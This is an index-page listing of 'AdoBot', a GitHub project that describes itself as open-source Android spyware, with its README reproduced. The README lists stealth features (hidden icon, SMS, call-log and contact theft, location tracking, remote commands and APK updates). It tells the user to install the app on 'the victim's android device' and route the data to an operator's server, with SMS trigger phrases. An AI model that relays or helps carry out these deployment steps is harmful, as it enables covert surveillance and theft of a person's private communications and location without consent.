Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/adonespitogo/adobot
Open-source android spyware
https://github.com/adonespitogo/adobot
android spyware
Last synced: 30 days ago
JSON representation
Open-source android spyware
- Host: GitHub
- URL: https://github.com/adonespitogo/adobot
- Owner: adonespitogo
- License: mit
- Created: 2017-02-17T16:14:24.000Z (almost 8 years ago)
- Default Branch: main
- Last Pushed: 2024-09-23T19:38:24.000Z (about 2 months ago)
- Last Synced: 2024-10-09T18:55:44.506Z (about 1 month ago)
- Topics: android, spyware
- Language: Java
- Homepage:
- Size: 1.54 MB
- Stars: 788
- Watchers: 72
- Forks: 310
- Open Issues: 23
-
Metadata Files:
- Readme: README.md
- Changelog: CHANGELOGS.md
- License: MIT-License.txt
Awesome Lists containing this project
README
# AdoBot
Opensource Android Spyware
# Features
- Realtime command execution
- Schedule commands
- Hidden app icon (stealth mode)
- Fetch SMS in
- Fetch call logs
- Fetch contacts
- Send SMS command
- Forward received/sent SMS
- Monitor location
- Update apk remotely
- Data collected are retained in database
- Realtime notifications about device status
- Transfer bot reporting to another server
- For android 6 and above:
- You can view the permissions of the app
- The app asks for permission when a certain command is sent the there is no permission# Need help/Todo
- access files
- take photo stealthly
- get browser history
- and more...# Instructions
Just compile (as signed APK) and install the app to the victim's android device. Then start the app and configure the parameters:
- ***Server URL:*** Set the URL of your [AdoBot-IO](https://github.com/adonespitogo/AdoBot-IO) server. It must include the protocol i.e. `https://adobot.herokuapp.com` (default).
- ***SMS Open Command:*** Send an SMS to any number containing this text to open the Adobot settings. "Open adobot" (default).
- ***Force Command:*** Send an SMS containing this text to the victim's phone to forcefully sync data to server. "Baby?" (default).Next go to [https://github.com/adonespitogo/AdoBot-IO](https://github.com/adonespitogo/AdoBot-IO) and follow the instructions on setting up the admin panel.
# Management Console Screen Shots
## Main GUI
![Adobot Main GUI](./screenshots/main.png "Adobot Main GUI")
## Location Tab
![Location Tab](./screenshots/location.png "Adobot Location Tab")
## Main SMS Tab
![Main SMS Tab](./screenshots/sms-main-1.png "Adobot Main SMS Tab")
## Single SMS Thread View
SMS thread is a pop up modal
![SMS Thread Tab](./screenshots/sms-thread-5.png "Adobot SMS Thread Tab")
## Call Logs Tab
![Call Logs Tab](./screenshots/call-logs.png "Adobot Call Logs Tab")
## Contacts Tab
![Contacts Tab](./screenshots/contacts.png "Adobot Contacts Tab")
## Pending Commands Tab
When you send a command to an offline device, the command is stored in the datase and will be executed once the device connects online.
![Pending commands Tab](./screenshots/pending-commands.png "Adobot Pending Commands Tab")
## Update APK
![Update APK](./screenshots/update-apk.png "Adobot update APK")
## Notifications
![Notification](./screenshots/notifications/notif2.png "Adobot notification")
![Notification](./screenshots/notifications/notif3.png "Adobot notification")## License
Released under [MIT License](./MIT-License.txt)